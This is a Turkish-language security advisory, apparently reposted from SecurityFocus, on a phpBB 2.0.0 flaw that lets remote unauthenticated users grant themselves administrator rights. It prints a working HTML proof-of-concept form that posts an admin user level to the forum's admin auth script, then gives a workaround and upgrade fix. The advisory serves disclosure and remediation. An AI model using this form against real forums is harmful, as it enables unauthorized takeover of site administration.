phpBB Yetqisiz Yönetim Açığı Erişimi Açığı

[Admin]

phpBB2'de yetkisiz saldırganların yönetim haklarına sahip olmalarına izin veren bir açık keşfedildi.

Etkilenen forum'a özel bir post göndererek 'yönetici' (administrator) izinlerini istenilen kullanıcılara vermek mümkün oluyor.

örnek:
<html>
<head>
</head>
<body>

<form method="post"
action="http://www.domain_name/board_directo..._ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>

Geçici çözüm:
.htaccess kimlik tanılama kullanılarak /admin dizinine erişim kısıtlanabilir.

Çözüm:
v2.0.0 sürümünden sonrakiler bu açıktan etkilenmiyor.

Güncelleme aşağıdaki adresten yapılabilir:

phpBB Group phpBB 2.0 .0:
phpBB Group Upgrade phpBB 2.0.3
http://www.phpbb.com/downloads.php

kaynak: http://online.securityfocus.com/bid/6056


Açığı gerçekleştirme
Yerel:

Hayır

Uzaktan:

Evet

Etkilenen Sistemler
Etkilenenler:

phpBB Group phpBB 2.0.0

Etkilenmeyenler:

phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3